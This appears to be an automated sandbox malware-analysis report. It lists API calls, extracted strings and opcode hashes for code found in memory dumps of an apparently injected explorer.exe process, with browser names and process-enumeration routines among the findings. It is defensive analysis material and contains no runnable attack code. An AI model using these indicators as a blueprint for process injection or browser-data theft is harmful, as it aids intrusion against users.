                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0AFFCDF2
                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0AFFCE38
                                                                                                                                                                                                    • Part of subcall function 0B00C06C: setlocale.LIBCMT ref: 0B00C080
                                                                                                                                                                                                    • Part of subcall function 0B00C06C: _Yarn.LIBCPMT ref: 0B00C09A
                                                                                                                                                                                                    • Part of subcall function 0B00C06C: setlocale.LIBCMT ref: 0B00C0A9
                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0AFFCE57
                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0AFFCE68
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • vmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0, xrefs: 0AFFCE4B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3861811657.000000000AFF0000.00000020.00000001.00020000.00000000.sdmp, Offset: 0AFF0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_aff0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarnstd::bad_exception::bad_exception
                                                                                                                                                                                                  • String ID: vmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0
                                                                                                                                                                                                  • API String ID: 409252694-2566049072
                                                                                                                                                                                                  • Opcode ID: 9f768d8d5cf71a7b318ba6a304cfc1fffb55f5fedb7a3e3c86de94bd0d3bb74e
                                                                                                                                                                                                  • Instruction ID: b72f123044f2c027f42af3bcbfb21020d0516f1be97ed79e4999deca55bfe911
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f768d8d5cf71a7b318ba6a304cfc1fffb55f5fedb7a3e3c86de94bd0d3bb74e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADF06D63220A4990DF24EF25DD901ADB325EF98B88FC86421C71E47AB9EF24C94AC350
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2998201375-0
                                                                                                                                                                                                  • Opcode ID: 9e1950b4a0606a39ec9e4de5ceeeb3a679c103b68c93a251864d8d2b12be611c
                                                                                                                                                                                                  • Instruction ID: 02dc7b8da31206ffb4f36797294d54a0a2df2d406d4d09428dd8e1bd1746a281
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e1950b4a0606a39ec9e4de5ceeeb3a679c103b68c93a251864d8d2b12be611c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC31DD3A315782C6DB30DF29E580229BB75FB95FC0F2A8226EB8957B59DB38C4418710
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0AFFC2E9
                                                                                                                                                                                                    • Part of subcall function 0AFFDB40: std::_Lockit::_Lockit.LIBCPMT ref: 0AFFDB56
                                                                                                                                                                                                    • Part of subcall function 0AFFDB40: std::_Lockit::~_Lockit.LIBCPMT ref: 0AFFDB79
                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0AFFC34E
                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0AFFC358
                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0AFFC37C
                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0AFFC38D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3861811657.000000000AFF0000.00000020.00000001.00020000.00000000.sdmp, Offset: 0AFF0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_aff0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3838066056-0
                                                                                                                                                                                                  • Opcode ID: 254e41802780ed1e6ed44638fa89dc74917af6e5ea373e5e1808f3821d6a3226
                                                                                                                                                                                                  • Instruction ID: e853e30b8d8916300449082e7b04746c9daeba23700e1ec22ed20c3b6c8bc22e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 254e41802780ed1e6ed44638fa89dc74917af6e5ea373e5e1808f3821d6a3226
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A118231614B4585EE14DB12E4443AAB361FB88BE4F884621DA9D07BF8EF7CC146C700
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0AFFC3B9
                                                                                                                                                                                                    • Part of subcall function 0AFFDB40: std::_Lockit::_Lockit.LIBCPMT ref: 0AFFDB56
                                                                                                                                                                                                    • Part of subcall function 0AFFDB40: std::_Lockit::~_Lockit.LIBCPMT ref: 0AFFDB79
                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0AFFC41E
                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0AFFC428
                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0AFFC44C
                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0AFFC45D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3861811657.000000000AFF0000.00000020.00000001.00020000.00000000.sdmp, Offset: 0AFF0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_aff0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3838066056-0
                                                                                                                                                                                                  • Opcode ID: 92d34fac3f999c6acc666f1ee0cd415b812483497a40d97679ab547c4ee43271
                                                                                                                                                                                                  • Instruction ID: 553a68b4c793cf03eef2ec2149fdc16feb4226fb144facb1bd10051499b1bf51
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92d34fac3f999c6acc666f1ee0cd415b812483497a40d97679ab547c4ee43271
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80115171714B4991EE14DB16E4453AAB361FBC8BE4F888621DA9D07BE8EF7CC146CB00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Module32$Next$CreateCurrentFirstProcessSnapshotToolhelp32
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3721439000-0
                                                                                                                                                                                                  • Opcode ID: bfe74005f11edf25df9aa976d2f8ffa720999daa244cf4553e34630531e0848c
                                                                                                                                                                                                  • Instruction ID: bca99d7d1609b0f5018f83609a0cc897c410944bc3732e9bee9deb2a2462d5b9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfe74005f11edf25df9aa976d2f8ffa720999daa244cf4553e34630531e0848c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D11A53A314789CAEB20DB65E8D03AE6365FBC5794F904229DAAD87698DF6CC509C700
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0C5CDD81
                                                                                                                                                                                                    • Part of subcall function 0C5D24AC: _getptd_noexit.LIBCMT ref: 0C5D24B2
                                                                                                                                                                                                    • Part of subcall function 0C5D24AC: _amsg_exit.LIBCMT ref: 0C5D24C2
                                                                                                                                                                                                  • _inconsistency.LIBCMT ref: 0C5CDD8F
                                                                                                                                                                                                    • Part of subcall function 0C5D4CB0: DecodePointer.KERNEL32 ref: 0C5D4CBB
                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0C5CDD94
                                                                                                                                                                                                  • _inconsistency.LIBCMT ref: 0C5CDDB0
                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0C5CDDC0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3669027769-0
                                                                                                                                                                                                  • Opcode ID: a59402f6edba0345271037812e36e693c9b41085103b3a28d7fde40256890806
                                                                                                                                                                                                  • Instruction ID: e472ba473be4cee597272f7541be316f39a6a745dd7c025cc7b55a0cde0a4cfd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a59402f6edba0345271037812e36e693c9b41085103b3a28d7fde40256890806
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8E0303A711781C4CA61AB96E1801FD6774FBC8B95F1E8539DB4547206DE24C4948364
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0B00D181
                                                                                                                                                                                                    • Part of subcall function 0B0118AC: _getptd_noexit.LIBCMT ref: 0B0118B2
                                                                                                                                                                                                    • Part of subcall function 0B0118AC: _amsg_exit.LIBCMT ref: 0B0118C2
                                                                                                                                                                                                  • _inconsistency.LIBCMT ref: 0B00D18F
                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0B00D194
                                                                                                                                                                                                  • _inconsistency.LIBCMT ref: 0B00D1B0
                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0B00D1C0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3861811657.000000000AFF0000.00000020.00000001.00020000.00000000.sdmp, Offset: 0AFF0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_aff0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _getptd$_inconsistency$_amsg_exit_getptd_noexit
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 823043651-0
                                                                                                                                                                                                  • Opcode ID: a59402f6edba0345271037812e36e693c9b41085103b3a28d7fde40256890806
                                                                                                                                                                                                  • Instruction ID: bc95469b932e5894166de6fc755306ac639e4a17c7ce9788891b0bc9b84bda89
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a59402f6edba0345271037812e36e693c9b41085103b3a28d7fde40256890806
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79E06536625580D5EA5DBBD6F1412ED63A5EF8CF80F0C9A328F4417355DF30C4908765
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0C5CDD74: _getptd.LIBCMT ref: 0C5CDD81
                                                                                                                                                                                                    • Part of subcall function 0C5CDD74: _inconsistency.LIBCMT ref: 0C5CDD8F
                                                                                                                                                                                                    • Part of subcall function 0C5CDD74: _getptd.LIBCMT ref: 0C5CDD94
                                                                                                                                                                                                    • Part of subcall function 0C5CDD74: _inconsistency.LIBCMT ref: 0C5CDDB0
                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0C5DF18B
                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0C5DF191
                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0C5DF1A4
                                                                                                                                                                                                    • Part of subcall function 0C5CDE04: _getptd.LIBCMT ref: 0C5CDE0D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                  • API String ID: 2821275340-1018135373
                                                                                                                                                                                                  • Opcode ID: 3d3c92d82db18198882214c5651a9633e7408605bbfd0fafc6450b131983cc71
                                                                                                                                                                                                  • Instruction ID: 3f95de803ff3829caa181dcf91c1f80fab14cd5d89079610d40ee6be58c73faf
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d3c92d82db18198882214c5651a9633e7408605bbfd0fafc6450b131983cc71
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42F03C7A741746CACB30AFBADC802AC3364F789B59F0A5635DE5A9B704DE20C9C5C381
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0B00D174: _getptd.LIBCMT ref: 0B00D181
                                                                                                                                                                                                    • Part of subcall function 0B00D174: _inconsistency.LIBCMT ref: 0B00D18F
                                                                                                                                                                                                    • Part of subcall function 0B00D174: _getptd.LIBCMT ref: 0B00D194
                                                                                                                                                                                                    • Part of subcall function 0B00D174: _inconsistency.LIBCMT ref: 0B00D1B0
                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0B01E58B
                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0B01E591
                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0B01E5A4
                                                                                                                                                                                                    • Part of subcall function 0B00D204: _getptd.LIBCMT ref: 0B00D20D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3861811657.000000000AFF0000.00000020.00000001.00020000.00000000.sdmp, Offset: 0AFF0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_aff0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                  • API String ID: 2821275340-1018135373
                                                                                                                                                                                                  • Opcode ID: 3d3c92d82db18198882214c5651a9633e7408605bbfd0fafc6450b131983cc71
                                                                                                                                                                                                  • Instruction ID: d75d721699c2261213dcf2eec101cfa6aeede388217c91a2c5279dcc4383ca81
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d3c92d82db18198882214c5651a9633e7408605bbfd0fafc6450b131983cc71
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9FF03C76A40641CDCB6CAF71D8812EC37A4EB89B5DF095935DE494B709EF30C481C340
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _callnewh.LIBCMT ref: 0C5CCE9E
                                                                                                                                                                                                  • malloc.LIBCMT ref: 0C5CCEAA
                                                                                                                                                                                                    • Part of subcall function 0C5CD80C: _FF_MSGBANNER.LIBCMT ref: 0C5CD83C
                                                                                                                                                                                                    • Part of subcall function 0C5CD80C: _NMSG_WRITE.LIBCMT ref: 0C5CD846
                                                                                                                                                                                                    • Part of subcall function 0C5CD80C: HeapAlloc.KERNEL32 ref: 0C5CD861
                                                                                                                                                                                                    • Part of subcall function 0C5CD80C: _callnewh.LIBCMT ref: 0C5CD87A
                                                                                                                                                                                                    • Part of subcall function 0C5CD80C: _errno.LIBCMT ref: 0C5CD885
                                                                                                                                                                                                    • Part of subcall function 0C5CD80C: _errno.LIBCMT ref: 0C5CD890
                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0C5CCEF3
                                                                                                                                                                                                    • Part of subcall function 0C5CD8CC: RtlPcToFileHeader.NTDLL ref: 0C5CD95B
                                                                                                                                                                                                    • Part of subcall function 0C5CD8CC: RaiseException.KERNEL32 ref: 0C5CD99A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                                                                                                                                  • String ID: bad allocation
                                                                                                                                                                                                  • API String ID: 1214304046-2104205924
                                                                                                                                                                                                  • Opcode ID: 7e016f7474c11ffc0ff3b41687f4ab61f2f18ebc43a9c4861304ae78cfb5a7fb
                                                                                                                                                                                                  • Instruction ID: d84f520d084f9b6f2053ca95eb959ec78f844e749a727086f631acc9ecc03b91
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e016f7474c11ffc0ff3b41687f4ab61f2f18ebc43a9c4861304ae78cfb5a7fb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33F0547D301B4BC5EF349790A8907A96354F7C5384F540529C94D0BB68EA7CE289CB01
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0C5B8DB0: HeapCreate.KERNEL32 ref: 0C5B8DCD
                                                                                                                                                                                                    • Part of subcall function 0C5CBEA0: lstrcpyA.KERNEL32 ref: 0C5CBEF4
                                                                                                                                                                                                  • RtlInitializeCriticalSection.NTDLL ref: 0C5CA2F1
                                                                                                                                                                                                  • RtlInitializeCriticalSection.NTDLL ref: 0C5CA2FE
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CriticalInitializeSection$CreateHeaplstrcpy
                                                                                                                                                                                                  • String ID: Chrome$Firefox
                                                                                                                                                                                                  • API String ID: 3526404123-2335468407
                                                                                                                                                                                                  • Opcode ID: 5e07859512231f11daf46f2108aaf14a9e0fc441baff142bfaa2047852e74c23
                                                                                                                                                                                                  • Instruction ID: bd13f4ea74826ac4665ab668dc03973b2ad7eef3cfb1cbcf62729140a291f94e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e07859512231f11daf46f2108aaf14a9e0fc441baff142bfaa2047852e74c23
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ACE07E7C611F4595FB08AB50FC84B8823A8B796702F800329C449022A1EF38A2DB8750
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrlenmallocmemcpy
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1128592954-0
                                                                                                                                                                                                  • Opcode ID: 02854ba5690ef61899528fd1c00c31fb9a56f33149eb045adfa6ca3a780793bd
                                                                                                                                                                                                  • Instruction ID: 1b58c0c90379e60db7a9263de351df87561a7168fb45086ba523b1df804a12ff
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 02854ba5690ef61899528fd1c00c31fb9a56f33149eb045adfa6ca3a780793bd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0901A725715B9481EF589B56BD8431AA7D1FB8CFC1F4C5134DE4E43B59EE2CE4828B40
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _errno$isxdigitstrtol
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1632192098-0
                                                                                                                                                                                                  • Opcode ID: 69d15012245a64e14370090e68f738929de3b6e67d6d537e295e31274d05cb8c
                                                                                                                                                                                                  • Instruction ID: bcd989f217b9610e78433ae9c72bef9e60b043413028bce41d7e9bdc6083cbc8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69d15012245a64e14370090e68f738929de3b6e67d6d537e295e31274d05cb8c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9561E43A305A84CAEB328F25E8943EA6F60F385B84F594625EF5A17793DB2DC085C711
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process32$Next$CreateFirstSnapshotToolhelp32
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1264244614-0
                                                                                                                                                                                                  • Opcode ID: 18d7f8252acd514d1597a9fdfeab4930f33a7e134656dfb34a9ff9cfff9c3af5
                                                                                                                                                                                                  • Instruction ID: 65766f44f01683fe57876bdcdd201c3e0816ea072b093081e9e7d91462a18fe9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18d7f8252acd514d1597a9fdfeab4930f33a7e134656dfb34a9ff9cfff9c3af5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1211BE3A314686C1DB20EB22E8903EE6371FBC9394F940225DA9D53698DF38D20DCB40
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: strncmp
                                                                                                                                                                                                  • String ID: false$true
                                                                                                                                                                                                  • API String ID: 1114863663-2658103896
                                                                                                                                                                                                  • Opcode ID: f1066a8645173136229eb2efb45e40c1fd4699fb6119855faf1669294ee49ae8
                                                                                                                                                                                                  • Instruction ID: 081e974a5e3d6fe5049b4be68b5fb7d04d83797cab066bbebbd8d772a02dc412
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f1066a8645173136229eb2efb45e40c1fd4699fb6119855faf1669294ee49ae8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58018F7971498082EF94CF27F94074AA760F7C4FC8F485066DF1D9BB89EB29C5918B04
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3861811657.000000000AFF0000.00000020.00000001.00020000.00000000.sdmp, Offset: 0AFF0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_aff0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: abort$_set_abort_behavior
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2064194629-0
                                                                                                                                                                                                  • Opcode ID: da11c466fb8982ce54f7a997522042ff2a06bc1c8b00337ed4e9437099afdc58
                                                                                                                                                                                                  • Instruction ID: 21e46fafcabf557d44b7e153d1bd5dbf7a1cf2f27ae15d62fbb9ed236fef8116
                                                                                                                                                                                                  • Opcode Fuzzy Hash: da11c466fb8982ce54f7a997522042ff2a06bc1c8b00337ed4e9437099afdc58
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8F08264221B0685FE6CB7A5E84935E3390FB8AB00F949A24C50D47BA0DF3CD455A311
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0B002B70: _RunAllParam.LIBCPMT ref: 0B002B8C
                                                                                                                                                                                                  • _RunAllParam.LIBCPMT ref: 0AFFD263
                                                                                                                                                                                                  • _RunAllParam.LIBCPMT ref: 0AFFD276
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • expression contained an invalid collating element name., xrefs: 0AFFD23A
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3861811657.000000000AFF0000.00000020.00000001.00020000.00000000.sdmp, Offset: 0AFF0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_aff0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Param
                                                                                                                                                                                                  • String ID: expression contained an invalid collating element name.
                                                                                                                                                                                                  • API String ID: 1698386829-2754792405
                                                                                                                                                                                                  • Opcode ID: eb74c98f7557745dedf6cc57d06a28c36d8000365bc639663f1a0e635120ede0
                                                                                                                                                                                                  • Instruction ID: 0560f93af1238b91a170dc969997e1214ed9a4e7ef86785248b544530e231887
                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb74c98f7557745dedf6cc57d06a28c36d8000365bc639663f1a0e635120ede0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BAF0306172270488EF28AFA6D4A036A3321EF85FC8F545922CE0E1B374CE29C4828380
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_dtor.LIBCPMT ref: 0B00BED9
                                                                                                                                                                                                    • Part of subcall function 0B00BFF4: std::_Lockit::_Lockit.LIBCPMT ref: 0B00C012
                                                                                                                                                                                                    • Part of subcall function 0B00BFF4: free.LIBCMT ref: 0B00C050
                                                                                                                                                                                                    • Part of subcall function 0B00BFF4: std::_Lockit::~_Lockit.LIBCPMT ref: 0B00C05B
                                                                                                                                                                                                  • free.LIBCMT ref: 0B00BEE7
                                                                                                                                                                                                    • Part of subcall function 0B00CBCC: _errno.LIBCMT ref: 0B00CBEC
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • r2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0, xrefs: 0B00BEF1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3861811657.000000000AFF0000.00000020.00000001.00020000.00000000.sdmp, Offset: 0AFF0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_aff0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Lockitfreestd::_$Locimp::_Locimp_dtorLockit::_Lockit::~__errnostd::locale::_
                                                                                                                                                                                                  • String ID: r2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0
                                                                                                                                                                                                  • API String ID: 161006167-214936948
                                                                                                                                                                                                  • Opcode ID: 082aa972adecea70bb272cbb0c61e4be5c98ab979181f1205983394c7bbe5373
                                                                                                                                                                                                  • Instruction ID: 06645542569f1f81c3de4cd4971c736e7cb6d747d06fd6f948480ac6c6c5eab9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 082aa972adecea70bb272cbb0c61e4be5c98ab979181f1205983394c7bbe5373
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CEF06D32621B4598FF29DFAAF4953A933B4EB4CB94F6891309A1D07365EF38C494C700
                                                                                                                                                                                                  APIs
